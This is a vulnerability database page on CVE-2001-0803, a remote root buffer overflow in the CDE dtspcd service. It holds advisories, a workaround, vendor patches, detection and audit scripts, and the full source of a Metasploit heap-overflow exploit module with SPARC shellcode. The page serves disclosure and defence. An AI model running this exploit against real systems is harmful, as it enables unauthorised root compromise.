CVE-2001-0803
CVSS 10.0
Published: 2001-12-06 00:00:00
Revised: 2008-09-05 00:00:00

[Original] Buffer overflow in the client connection routine of libDtSvc.so.1 in CDE Subprocess Control Service (dtspcd) allows remote attackers to execute arbitrary commands.


[CNNVD] Sun Solaris CDE dtspcd Remote Buffer Overflow Vulnerability (CNNVD-200112-068)

        
        The Common Desktop Environment (CDE) is an integrated graphical user interface that runs on UNIX and Linux operating systems. The CDE Subprocess Control Service (dtspcd) is a network daemon that accepts requests from clients to execute commands and launch applications remotely. On systems using CDE, dtspcd is spawned by the Internet services daemon (usually inetd or xinetd) when a CDE client request arrives. In its typical configuration dtspcd runs as root on TCP port 6112.
        The dtspcd implementation contains a buffer overflow; a remote attacker can exploit it to execute arbitrary instructions on the host with root privileges and thereby take complete control of the host.
        A shared library used by dtspcd contains a remotely exploitable buffer overflow. During client negotiation dtspcd accepts a length value and other data from the client without validating it properly. A malicious client can therefore construct and send malformed data to dtspcd, trigger the overflow, and potentially execute arbitrary code as root.
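The negotiation the paragraph above describes, as an added example written for this page (it is not code from CDE or from the Metasploit module reproduced further down, although it follows that module's wire layout): a client that registers with dtspcd and parses the host:os:version:arch banner the way the module's check does, and a fake dtspcd that reads the client-supplied body length and refuses anything above its buffer size, which is the check the vulnerable library lacked. The 20-byte header layout, command number 4 for registration and the registration body layout are taken from the module; the 4096-byte buffer ceiling, the banner string and the fake daemon itself are constructed for the demo.

```ruby
require 'socket'

# Added example, not code from the page's Metasploit module or from CDE:
# a minimal client for the dtspcd SPC framing the module uses, and a fake
# dtspcd that applies the body-length check the real daemon did not.

SPC_HEADER_LEN = 20     # "%08x%02x%04x%04x  " = 8 + 2 + 4 + 4 + 2 bytes
SPC_REGISTER   = 4      # command number the module sends to register a client
SPC_MAX_BODY   = 4096   # assumed server-side buffer size; not taken from CDE source

module SpcProto
  module_function

  # Header in the exact layout the module builds with sprintf.
  def header(cmd:, body_len:, seq:, channel: 2)
    format('%08x%02x%04x%04x  ', channel, cmd, body_len, seq)
  end

  # Decode a header; mbl (message body length) is the client-supplied
  # field that dtspcd trusted when copying the body.
  def parse_header(head)
    raise 'short SPC header' unless head && head.bytesize == SPC_HEADER_LEN
    { channel: head[0, 8].hex, cmd: head[8, 2].hex,
      mbl: head[10, 4].hex, seq: head[14, 4].hex }
  end

  # Registration body in the layout of the module's spc_register.
  def register_body(user, extra = '')
    "4 \x00#{user}\x00\x0010\x00#{extra}"
  end

  def write_message(io, cmd, body, seq)
    io.write(header(cmd: cmd, body_len: body.bytesize, seq: seq) + body)
  end
end

# Server side: read one message, refusing a body longer than the buffer.
# Returns [header, body], or nil when the peer exceeded the bound.
def spc_read_bounded(io, max_body = SPC_MAX_BODY)
  hdr = SpcProto.parse_header(io.read(SPC_HEADER_LEN))
  return nil if hdr[:mbl] > max_body          # the check the daemon was missing
  [hdr, io.read(hdr[:mbl]) || '']
end

# Fake dtspcd for one connection (constructed for this demo). It answers a
# registration with the "host:os:version:arch" string the module parses.
def fake_dtspcd_serve(io, banner = "cdehost:SunOS:5.8:sun4u\x00")
  msg = spc_read_bounded(io)
  if msg && msg[0][:cmd] == SPC_REGISTER
    SpcProto.write_message(io, SPC_REGISTER, banner, msg[0][:seq])
  end
rescue StandardError
  nil
ensure
  io.close
end

# Client side: fingerprint a dtspcd the way the module's check does.
# `io` is any socket; for a live host use TCPSocket.new(host, 6112).
def probe_dtspcd(io, user = 'root')
  SpcProto.write_message(io, SPC_REGISTER, SpcProto.register_body(user, "\x00"), 1)
  head = io.read(SPC_HEADER_LEN)
  return nil unless head
  hdr  = SpcProto.parse_header(head)
  body = io.read(hdr[:mbl]) || ''
  host, os, ver, arch = body.delete("\x00").split(':')
  host ? { host: host, os: os, ver: ver, arch: arch } : nil
end

# Send a header announcing a 0x103e-byte body (the size the module uses)
# and no body; a server that checks mbl closes the connection without replying.
def probe_oversized(io)
  io.write(SpcProto.header(cmd: SPC_REGISTER, body_len: 0x103e, seq: 1))
  io.read(SPC_HEADER_LEN).nil?
end

# Run a client routine against the fake daemon over an in-process socket pair.
def against_fake_dtspcd
  client, server = UNIXSocket.pair
  t = Thread.new { fake_dtspcd_serve(server) }
  result = yield client
  t.join
  result
ensure
  client&.close
end

if __FILE__ == $0
  p against_fake_dtspcd { |io| probe_dtspcd(io) }
  p against_fake_dtspcd { |io| probe_oversized(io) }
end
```

Against a live host, replace the socket pair with TCPSocket.new(host, 6112). A daemon that answers the registration is running dtspcd; one that drops the oversized header without replying is at least enforcing a length bound, which on its own does not prove it carries the vendor patch.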
        

- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in complete system shutdown]
Attack complexity: LOW [no special access conditions required for exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

cpe:/a:open_group:cde_common_desktop_environment:2.0
cpe:/a:open_group:cde_common_desktop_environment:2.1
cpe:/a:open_group:cde_common_desktop_environment:1.0.1
cpe:/a:open_group:cde_common_desktop_environment:1.0.2
cpe:/a:open_group:cde_common_desktop_environment:1.2
cpe:/a:open_group:cde_common_desktop_environment:1.1

- OVAL (technical details for detection)

oval:org.mitre.oval:def:74  Solaris 7 CDE dtspcd Buffer Overflow
oval:org.mitre.oval:def:70  Solaris 8 CDE dtspcd Buffer Overflow
*OVAL describes in detail how to detect this vulnerability; see the related OVAL definitions for further technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0803
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0803
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-068
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/172583
(VENDOR_ADVISORY)  CERT-VN  VU#172583
http://www.cert.org/advisories/CA-2002-01.html
(UNKNOWN)  CERT  CA-2002-01
http://www.cert.org/advisories/CA-2001-31.html
(UNKNOWN)  CERT  CA-2001-31
http://www.securityfocus.com/bid/3517
(VENDOR_ADVISORY)  BID  3517
http://www.securityfocus.com/advisories/3651
(VENDOR_ADVISORY)  HP  HPSBUX0111-175
http://xforce.iss.net/static/7396.php
(UNKNOWN)  XF  cde-dtspcd-bo(7396)
http://xforce.iss.net/alerts/advise101.php
(VENDOR_ADVISORY)  ISS  20011112 Multi-Vendor Buffer Overflow Vulnerability in CDE Subprocess Control Service
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/214
(UNKNOWN)  SUN  00214
http://ftp.support.compaq.com/patches/.new/html/SSRT-541.shtml
(UNKNOWN)  COMPAQ  SSRT541
ftp://stage.caldera.com/pub/security/openunix/CSSA-2001-SCO.30/
(UNKNOWN)  CALDERA  CSSA-2001-SCO.30
ftp://patches.sgi.com/support/free/security/advisories/20011107-01-P
(UNKNOWN)  SGI  20011107-01-P

- Vulnerability information

Sun Solaris CDE dtspcd Remote Buffer Overflow Vulnerability
Critical  Boundary Condition Error
2001-12-06 00:00:00 2006-11-13 00:00:00
Remote

- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Disable the 'dtspcd' service. Using Solaris as the example:
         1. Become root
         $ su -
         #
        
         2. Disable the dtspcd service
         Open /etc/inetd.conf in your editor and find the line:
         dtspc stream tcp nowait root /usr/dt/bin/dtspcd /usr/dt/bin/dtspcd
         Comment it out by adding a "#" at the start of the line:
         #dtspc stream tcp nowait root /usr/dt/bin/dtspcd /usr/dt/bin/dtspcd
         Save the change and exit the editor.
        
         3. Remove the execute permission from dtspcd
         # chmod 000 /usr/dt/bin/dtspcd
         4. Make inetd re-read its configuration (SIGHUP reloads it without a restart)
        
         # ps -ef|grep inetd
         root 167 1 0 Oct 07 ? 0:07 /usr/sbin/inetd -s -t
         # kill -HUP 167 (in this example 167 is the pid of inetd)
        Other operating systems can follow the same steps.
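A check for the condition the workaround above removes, as an added example and not part of the CNNVD advisory: a small parser for inetd.conf that reports every active dtspc/dtspcd entry together with the user it runs as, ignoring lines that have already been commented out. The inetd.conf excerpt is constructed for the demo in the layout shown in step 2.

```ruby
# Added example, not part of the CNNVD advisory: audit inetd.conf text for
# an enabled dtspcd entry, the condition the workaround above removes.

# Constructed inetd.conf excerpt in the layout shown in step 2: one active
# dtspc line, one already commented out, and an unrelated service.
SAMPLE_INETD_CONF = <<~CONF
  # Solaris inetd.conf excerpt (constructed for this example)
  ftp     stream  tcp     nowait  root    /usr/sbin/in.ftpd   in.ftpd
  #dtspc  stream  tcp     nowait  root    /usr/dt/bin/dtspcd  /usr/dt/bin/dtspcd
  dtspc\tstream\ttcp\tnowait\troot\t/usr/dt/bin/dtspcd\t/usr/dt/bin/dtspcd
CONF

InetdEntry = Struct.new(:service, :socket_type, :proto, :wait, :user,
                        :server, :args, :line_no)

# Parse inetd.conf text into active entries. Blank lines, comment lines and
# trailing "# ..." comments are dropped; a line counts as active only if it
# still has the six mandatory fields after that.
def parse_inetd_conf(text)
  text.each_line.with_index(1).map do |line, no|
    body = line.sub(/#.*/, '').strip
    next if body.empty?
    f = body.split(/\s+/, 7)
    next if f.size < 6
    InetdEntry.new(f[0], f[1], f[2], f[3], f[4], f[5], f[6].to_s, no)
  end.compact
end

# Active entries that would spawn dtspcd, matched by service name or by the
# basename of the server binary (the service name alone is easy to rename).
def find_dtspcd(entries)
  entries.select do |e|
    e.service == 'dtspc' || File.basename(e.server) == 'dtspcd'
  end
end

# One finding per active dtspcd line; root is the default and the worst case.
def dtspcd_findings(text)
  find_dtspcd(parse_inetd_conf(text)).map do |e|
    severity = e.user == 'root' ? 'HIGH' : 'MEDIUM'
    "#{severity}: line #{e.line_no}: #{e.service}/#{e.proto} runs #{e.server} as #{e.user}"
  end
end

if __FILE__ == $0
  text = File.exist?('/etc/inetd.conf') ? File.read('/etc/inetd.conf') : SAMPLE_INETD_CONF
  findings = dtspcd_findings(text)
  puts(findings.empty? ? 'no active dtspcd entry' : findings)
end
```

Run it on the real /etc/inetd.conf after step 2; an empty result means no line would still spawn dtspcd when inetd re-reads its configuration, and the chmod in step 3 covers the case where a line is re-enabled later.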
        Vendor patches:
        Caldera
        -------
        Caldera has released a security advisory (CSSA-2001-SCO.30) and patches:
        CSSA-2001-SCO.30: Open UNIX, UnixWare 7: CDE SPC library buffer overflow
        Link: ftp://stage.caldera.com/pub/security/openunix/CSSA-2001-SCO.30/
        Patch downloads:
        Caldera UnixWare 7:
        Caldera Patch erg711881.Z
        ftp://stage.caldera.com/pub/security/openunix/CSSA-2001-SCO.30/erg711881.Z
        Caldera OpenUnix 8.0:
        Caldera Patch erg711881.Z
        ftp://stage.caldera.com/pub/security/openunix/CSSA-2001-SCO.30/erg711881.Z
        HP
        --
        HP has released a security advisory (HPSBUX0111-175) and patches:
        HPSBUX0111-175: Buffer overflow in dtspcd
        Patch downloads:
         10.10 PHSS_25785
         10.20 PHSS_25786
         10.24 PHSS_26029
         11.00 PHSS_25787
         11.04 PHSS_26030
         11.11 PHSS_25788
        The patches can be downloaded from HP's ftp site:
        ftp://us-ffs.external.hp.com/hp-ux_patches
        Patch installation (PHSS_xxxxx below stands for the patch matching your HP-UX release in the list above):
         1. Back up the system before installing the patch.
         2. Log in as root.
        
         3. Copy the patch to /tmp.
        
         4. Change to /tmp and unshar the patch:
        
         cd /tmp
         sh PHSS_xxxxx
        
         5. On a stand-alone system, run swinstall to install the patch:
        
         swinstall -x autoreboot=true -x match_target=true \
         -s /tmp/PHSS_xxxxx.depot
        
         By default the original software is backed up under /var/adm/sw/patch/PHSS_xxxxx. If you do not want to keep a backup, create the empty file /var/adm/sw/patch/PATCH_NOSAVE and the system will not save one.
        
         Warning: if that file exists when the patch is installed, the patch cannot be removed afterwards; use this feature with care.
        IBM
        ---
        IBM has released a security advisory (IBM-20011029-01) and patches:
        IBM-20011029-01: Buffer overflow vulnerability in CDE DtSvc library
        Patch downloads:
        IBM has released two APARs and an emergency fix:
        AIX 4.3 APAR IY25436
        AIX 5.1 APAR IY25437
        The emergency fix is named "CDE_dtspcd_efix.tar.Z" and can be downloaded from:
        ftp://aix.software.ibm.com/aix/efixes/security/
        Open Group
        ----------
        The vendor has not yet provided a patch or upgrade; users of this software should watch the vendor's home page for the latest version:
        
        http://www.opengroup.org/cde/

        SGI
        ---
        SGI has released a security advisory (20011107-01-P) and a patch:
        20011107-01-P: CDE vulnerabilities
        Link: ftp://patches.sgi.com/support/free/security/advisories/20011107-01-P
        Patch download:
        SGI has provided patch 4416 for CDE, applicable to IRIX 6.5 through 6.5.14.
        The patch can be downloaded from:
        ftp://patches.sgi.com/support/free/security/patches/
        Sun
        ---
        Sun has released a security bulletin (Sun-00214) and patches:
        Sun-00214: dtspcd
        Link:
        http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/214&type=0&nav=sec.sba

        Patch downloads:
         OS Version       Patch ID
         ___________      _________
         SunOS 5.8        108949-07
         SunOS 5.8_x86    108950-07
         SunOS 5.7        106934-04
         SunOS 5.7_x86    106935-04
         SunOS 5.6        105669-11
         SunOS 5.6_x86    105670-10
         SunOS 5.5.1      108363-02
         SunOS 5.5.1_x86  108364-02
        Each patch can be downloaded from:
        
        http://sunsolve.sun.com/pub-cgi/patchDownload.pl?target=<patch ID>&method=h

        For example, for patch 108949-07 (SunOS 5.8) the link is:
        
        http://sunsolve.sun.com/pub-cgi/patchDownload.pl?target=108949&method=h

        Patch installation:
        1. Uncompress the patch archive with unzip or uncompress.
        2. Install it with patchadd, for example:
        
         #patchadd /var/spool/patch/108949-07
        
         assuming the patch is 108949-07 and it was extracted to "/var/spool/patch/108949-07".
        Xi Graphics
        -----------
        The vendor has provided a security patch; the instructions and the patch are available at:
        ftp://ftp.xig.com/updates/dextop/2.1/DEX2100.012.txt
        ftp://ftp.xig.com/updates/dextop/2.1/DEX2100.012.tar.gz

- Vulnerability information (16323)

Solaris dtspcd Heap Overflow (EDBID:16323)
solaris/sparc remote
2010-04-30 Verified
0 metasploit
N/A [Download]
##
# $Id: heap_noir.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Solaris dtspcd Heap Overflow',
			'Description'    => %q{
					This is a port of noir's dtspcd exploit. This module should
				work against any vulnerable version of Solaris 8 (sparc).
				The original exploit code was published in the book
				Shellcoder's Handbook.
			},
			'Author'         => [ 'noir <noir@uberhax0r.net>', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2001-0803'],
					[ 'OSVDB', '4503'],
					[ 'BID', '3517'],
					[ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'],
					[ 'URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x0d",
					'PrependEncoder' => ("\xa4\x1c\x40\x11" * 3),
				},
			'Platform'       => 'solaris',
			'Arch'           => ARCH_SPARC,
			'Targets'        =>
				[
					['Solaris 8',
						{ 'Rets' =>
							[0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] ]
						}
					],
				],
			'DisclosureDate' => 'Jul 10 2002',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(6112)
			], self.class)
	end


	def exploit
		return if not dtspcd_uname()

		target['Rets'][4].each do |tjmp|

			rbase = target['Rets'][1]

			while (rbase < target['Rets'][2]) do
				break if session_created?
				begin
					print_status(sprintf("Trying 0x%.8x 0x%.8x...", target['Rets'][0] + tjmp, rbase))
					attack(target['Rets'][0] + tjmp, rbase, payload.encoded)
					break if session_created?

					attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded)
					rbase += target['Rets'][3]
				rescue EOFError
				end
			end
		end

		handler
		disconnect
	end

	def check
		return Exploit::CheckCode::Detected if dtspcd_uname()
		return Exploit::CheckCode::Safe
	end

	def dtspcd_uname
		spc_connect()
		spc_write(spc_register('root', "\x00"), 4)
		host, os, ver, arch = spc_read().gsub("\x00", '').split(':')

		return false if not host

		print_status("Detected dtspcd running #{os} v#{ver} on #{arch} hardware")
		spc_write("", 2)
		return true
	end


	def chunk_create(retloc, retadd)
		"\x12\x12\x12\x12" +
		[retadd].pack('N')+
		"\x23\x23\x23\x23\xff\xff\xff\xff" +
		"\x34\x34\x34\x34\x45\x45\x45\x45" +
		"\x56\x56\x56\x56" +
		[retloc - 8].pack('N')
	end


	def attack(retloc, retadd, fcode)
		spc_connect()

		begin
			buf = ("\xa4\x1c\x40\x11\x20\xbf\xff\xff"  * ((4096 - 8 - fcode.length) / 8)) + fcode
			buf << "\x00\x00\x10\x3e\x00\x00\x00\x14"
			buf << "\x12\x12\x12\x12\xff\xff\xff\xff"
			buf << "\x00\x00\x0f\xf4"
			buf << chunk_create(retloc, retadd)
			buf << "X" * ((0x103e - 8) - buf.length)

			spc_write(spc_register("", buf), 4)

			handler

		rescue EOFError
		end
	end


	# Registration request body in the layout the original exploit uses: a
	# fixed "4 " prefix, the user name, a fixed "10" field, then the caller's buffer.
	def spc_register(user='', buff='')
		"4 \x00#{user}\x00\x0010\x00#{buff}"
	end

	# Frame one SPC message: channel (8 hex digits), cmd (2), body length (4),
	# sequence number (4), two spaces, then the body.
	def spc_write(buff = '', cmd='')
		sock.put(sprintf("%08x%02x%04x%04x  %s", 2, cmd, buff.length, (@spc_seq += 1), buff))
	end

	# Read one SPC reply. The 20-byte header mirrors spc_write:
	# bytes 0-7 = channel, 8-9 = cmd, 10-13 = mbl (body length), 14-17 = seq,
	# 18-19 = padding. Only the four mbl digits are parsed as the body length.
	def spc_read
		head = sock.get_once(20)
		return '' if not head
		sock.get_once( head[10, 4].hex ) || ''
	end

	# Fresh connection with the sequence counter reset.
	def spc_connect
		disconnect
		connect
		@spc_seq = 0
	end

end
		

- Vulnerability information (F82312)

Solaris dtspcd Heap Overflow (PacketStormID:F82312)
2009-10-28 00:00:00
noir  metasploit.com
exploit,shellcode
solaris
CVE-2001-0803
[Download]

This is a port of noir's dtspcd exploit. This Metasploit module should work against any vulnerable version of Solaris 8 (sparc). The original exploit code was published in the book Shellcoder's Handbook.

The module source in this entry is the same Metasploit module listed above under EDBID:16323, differing only in the unexpanded $Id$ and $Revision$ keywords and an extra generic rescue clause in 'attack' that prints the error to stderr.

    

- Vulnerability information

4503
CDE Subprocess Control Service (dtspcd) libDtSvc.so.1 Remote Overflow
Remote / Network Access, Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- Vulnerability description

A remote overflow exists in CDE dtspcd. dtspcd fails to perform proper bounds checking within 'libDtSvc' resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2002-07-10 Unknown
2002-07-10 Unknown

- Solution

Currently, there are no known workarounds to correct this issue. However, each respective vendor has released a patch and/or new software versions to address this vulnerability.

- References

- Author

- Vulnerability information

Multiple Vendor CDE dtspcd Buffer Overflow Vulnerability
Boundary Condition Error 3517
Remote: Yes  Local: No
2001-11-06 12:00:00 2007-11-05 03:25:00
This vulnerability was originally discovered by Chris Spencer of the ISS X-Force.

- Affected software versions

Xi Graphics Maximum CDE 1.2.3
Xi Graphics DeXtop 2.1
Sun Solaris 2.5.1 _x86
Sun Solaris 2.5.1 _ppc
Sun Solaris 2.5.1
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Sun Solaris 2.5_x86
Sun Solaris 2.5
Sun Solaris 2.4_x86
Sun Solaris 2.4
SGI IRIX 6.5.13
SGI IRIX 6.5.12
SGI IRIX 6.5.11
SGI IRIX 6.5.10
SGI IRIX 6.5.9
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.5
SGI IRIX 6.5.4
SGI IRIX 6.5.3
SGI IRIX 6.5.2
SGI IRIX 6.5.1
SGI IRIX 6.5
SGI IRIX 6.4
SGI IRIX 6.3
SGI IRIX 6.2
SGI IRIX 6.1
Open Group CDE Common Desktop Environment 2.1
+ Sun Solaris 9_x86 Update 2
+ Sun Solaris 9_x86
+ Sun Solaris 9
Open Group CDE Common Desktop Environment 2.0
Open Group CDE Common Desktop Environment 1.2
Open Group CDE Common Desktop Environment 1.1
Open Group CDE Common Desktop Environment 1.0.2
Open Group CDE Common Desktop Environment 1.0.1
IBM AIX 4.3.3
IBM AIX 4.3.2
IBM AIX 4.3.1
IBM AIX 4.3
IBM AIX 4.2.1
IBM AIX 4.2
IBM AIX 4.1.5
IBM AIX 4.1.4
IBM AIX 4.1.3
IBM AIX 4.1.2
IBM AIX 4.1.1
IBM AIX 4.1
IBM AIX 4.0
IBM AIX 5.1
HP HP-UX (VVOS) 11.0.4
HP HP-UX (VVOS) 11.0 4
HP HP-UX (VVOS) 10.24
HP HP-UX 11.11
HP HP-UX 11.0
HP HP-UX 10.20
HP HP-UX 10.10
Compaq Tru64 5.1 a
Compaq Tru64 5.1
Compaq Tru64 5.0 a
Compaq Tru64 5.0
Compaq Tru64 4.0 g
Compaq Tru64 4.0 f
Caldera UnixWare 7
Caldera OpenUnix 8.0

- Discussion

CDE is a Motif-based graphical user environment for UNIX systems. It is shipped with a number of commercial systems.

A buffer-overflow vulnerability in the 'dtspcd' component may allow a remote attacker to gain administrative privileges on the affected host. The overflow is believed to be in the libDtSvc library, which is used by the 'Subprocess Control Service'. The overflow is exploitable through the 'dtspcd' service, a server utility that facilitates remote invocation of CDE utilities and commands. The 'dtspcd' service listens on TCP port 6112, runs with root privileges, and is enabled by default (through 'inetd') on many systems.

- Exploit

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

There is information from a highly credible source that an exploit for this vulnerability is currently in use in the wild.

An exploit has been released as part of the MetaSploit Framework 2.3.

- Solution

Vendor fixes are available. Please see the references for details.


Sun Solaris 8_sparc

IBM AIX 5.1

Sun Solaris 2.6

Caldera UnixWare 7

Sun Solaris 2.6_x86

Sun Solaris 7.0

Sun Solaris 7.0_x86

Sun Solaris 8_x86

HP HP-UX 10.10
  • HP PHSS_25785
    http://itrc.hp.com

  • HP Temporary Hotfix: dtspcd.tar.gz
    To install this emergency hotfix, download the archive and place it in a protected directory. Verify the integrity of the archive: MD5 Sum: b122f84857f4da65b50d9926201608a1. Unpack it, and run 'install_dtspcd x' where 'x' is one of: dtspcd.10.10, dtspcd.10.20, dtspcd.11.00, dtspcd.11.11. The value chosen depends
    ftp://dtspcd:dtspcd@hprc.external.hp.com/dtspcd.tar.gz


HP HP-UX 10.20
  • HP PHSS_25786
    http://itrc.hp.com

  • HP Temporary Hotfix: dtspcd.tar.gz
    To install this emergency hotfix, download the archive and place it in a protected directory. Verify the integrity of the archive: MD5 Sum: b122f84857f4da65b50d9926201608a1. Unpack it, and run 'install_dtspcd x' where 'x' is one of: dtspcd.10.10, dtspcd.10.20, dtspcd.11.00, dtspcd.11.11. The value chosen depends
    ftp://dtspcd:dtspcd@hprc.external.hp.com/dtspcd.tar.gz


HP HP-UX (VVOS) 10.24

HP HP-UX 11.0
  • HP PHSS_25787
    http://itrc.hp.com

  • HP PHSS_27869
    http://itrc.hp.com

  • HP Temporary Hotfix: dtspcd.tar.gz
    To install this emergency hotfix, download the archive and place it in a protected directory. Verify the integrity of the archive: MD5 Sum: b122f84857f4da65b50d9926201608a1. Unpack it, and run 'install_dtspcd x' where 'x' is one of: dtspcd.10.10, dtspcd.10.20, dtspcd.11.00, dtspcd.11.11. The value chosen depends
    ftp://dtspcd:dtspcd@hprc.external.hp.com/dtspcd.tar.gz


HP HP-UX (VVOS) 11.0 4

HP HP-UX (VVOS) 11.0.4
  • HP Temporary Hotfix: dtspcd.tar.gz
    To install this emergency hotfix, download the archive and place it in a protected directory. Verify the integrity of the archive: MD5 Sum: b122f84857f4da65b50d9926201608a1. Unpack it, and run 'install_dtspcd x' where 'x' is one of: dtspcd.10.10, dtspcd.10.20, dtspcd.11.00, dtspcd.11.11. The value chosen depends
    ftp://dtspcd:dtspcd@hprc.external.hp.com/dtspcd.tar.gz


HP HP-UX 11.11
  • HP PHSS_25788
    http://itrc.hp.com

  • HP Temporary Hotfix: dtspcd.tar.gz
    To install this emergency hotfix, download the archive and place it in a protected directory. Verify the integrity of the archive: MD5 Sum: b122f84857f4da65b50d9926201608a1. Unpack it, and run 'install_dtspcd x' where 'x' is one of: dtspcd.10.10, dtspcd.10.20, dtspcd.11.00, dtspcd.11.11. The value chosen depends
    ftp://dtspcd:dtspcd@hprc.external.hp.com/dtspcd.tar.gz


Xi Graphics DeXtop 2.1

Sun Solaris 2.5.1 _x86

Sun Solaris 2.5.1

Compaq Tru64 4.0 f

Compaq Tru64 4.0 g

IBM AIX 4.1
  • IBM IX89806


IBM AIX 4.2
  • IBM IX89893


IBM AIX 4.3
  • IBM IX89419


IBM AIX 4.3.3
  • IBM IY06694


Compaq Tru64 5.0 a

Compaq Tru64 5.1 a

Compaq Tru64 5.1

SGI IRIX 6.5

SGI IRIX 6.5.1

SGI IRIX 6.5.10

SGI IRIX 6.5.11

SGI IRIX 6.5.12

SGI IRIX 6.5.13

SGI IRIX 6.5.2

SGI IRIX 6.5.3

SGI IRIX 6.5.4

SGI IRIX 6.5.5

SGI IRIX 6.5.6

SGI IRIX 6.5.7

SGI IRIX 6.5.8

SGI IRIX 6.5.9

Caldera OpenUnix 8.0

- References
